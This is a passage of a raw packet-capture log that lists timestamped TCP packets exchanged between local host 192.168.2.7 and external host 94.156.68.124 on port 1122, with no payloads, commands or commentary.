                                  Sep 25, 2024 01:11:12.142191887 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.142278910 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142294884 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142317057 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.142450094 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142467022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142482996 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142491102 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.142499924 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142515898 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142530918 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142543077 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.142549038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142573118 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.142596006 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.142863989 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142879963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142895937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142910957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142919064 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.142926931 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142941952 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142952919 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.142957926 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.142978907 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.143152952 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143170118 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143191099 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.143219948 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143234968 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143249989 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143256903 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.143268108 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143291950 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.143627882 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143646002 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143661976 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143671036 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.143687963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143696070 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.143704891 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143721104 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143737078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143738985 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.143753052 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143769026 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.143771887 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.143814087 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.144213915 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144231081 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144246101 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144259930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144272089 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.144275904 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144290924 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.144292116 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144309998 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144325972 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144332886 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.144361973 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.144757032 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144772053 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144788027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144802094 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144818068 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144818068 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.144833088 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144839048 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.144850016 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144865990 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.144866943 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.144906044 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.145210028 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145224094 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145237923 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145252943 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145262957 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.145267010 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145282984 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.145282984 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145298958 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145314932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145319939 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.145328999 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145344973 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145354033 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.145363092 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145378113 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145390034 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.145416021 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.145889997 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145906925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145920992 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145935059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145951033 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145965099 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.145965099 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.145981073 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.145982981 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146006107 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146008015 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146022081 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146038055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146050930 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146053076 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146070004 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146075010 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146084070 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146100044 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146102905 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146116018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146128893 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146141052 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146145105 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146163940 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146164894 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146203041 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146816015 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146836042 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146851063 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146866083 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146879911 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146888018 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146897078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146913052 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146928072 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146934032 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146934032 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146943092 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146959066 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146960974 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.146974087 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.146996021 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.147013903 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.147021055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.147037029 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.147041082 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.147056103 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.147072077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.147089005 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.147114038 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.147564888 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.147583008 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.147599936 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.147619963 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.196537971 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.225805998 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.225830078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.225846052 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.225908995 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.225925922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.225950003 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.225970030 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.226089001 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226104975 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226121902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226130962 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.226138115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226152897 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226161003 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.226185083 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.226372957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226387024 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226402044 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226416111 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226421118 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.226429939 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226457119 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.226670027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226686001 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226701021 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226711035 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.226718903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226735115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226736069 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.226771116 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.226973057 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.226988077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.227009058 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.227025986 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.230701923 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.230721951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.230737925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.230797052 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.230814934 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.230842113 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.230858088 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.230873108 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.230895996 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.230973959 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.230988026 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231003046 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231014967 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.231036901 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.231173038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231188059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231201887 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231219053 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231232882 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231234074 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.231256962 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.231477976 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231492996 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231508017 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231523037 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231523991 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.231539011 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231548071 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.231555939 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231570959 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.231574059 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.231615067 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.232278109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232291937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232306957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232322931 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232335091 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.232338905 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232355118 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.232445002 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232460022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232474089 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232481956 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.232507944 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.232796907 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232812881 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232826948 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232841969 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.232851982 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.232877970 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.233051062 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233067036 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233083010 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233095884 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233105898 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.233130932 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.233242035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233256102 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233270884 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233284950 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233295918 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.233300924 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233315945 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233321905 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.233334064 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233349085 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233359098 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.233386040 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.233886957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233902931 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233917952 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233932972 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233947992 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233952999 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.233966112 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.233973980 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.233983994 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234000921 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.234363079 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234378099 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234392881 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234407902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234420061 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.234424114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234441042 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234448910 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.234462023 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234462976 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.234477043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234499931 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.234687090 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234702110 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234718084 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234730959 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.234754086 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.234834909 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234849930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234872103 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234886885 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234889030 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.234903097 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.234920979 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235007048 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235019922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235034943 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235044956 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235049963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235065937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235069036 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235111952 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235166073 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235182047 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235196114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235213041 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235224962 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235228062 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235243082 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235244989 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235256910 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235270977 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235281944 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235285997 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235301018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235308886 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235316992 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235332966 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235837936 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.235889912 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.235990047 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236006021 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236020088 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236036062 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236044884 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.236049891 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236066103 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236074924 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.236083031 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236098051 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236103058 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.236123085 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236140013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236154079 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236167908 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236170053 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.236177921 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.236186028 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236198902 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.236574888 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.236623049 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.310616970 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.310640097 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.310657024 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.310694933 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.310712099 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.310725927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.310765982 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.310806990 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.310853004 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.310869932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.310885906 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.310914040 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.311043978 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311059952 CEST11224970094.156.68.124192.168.2.7
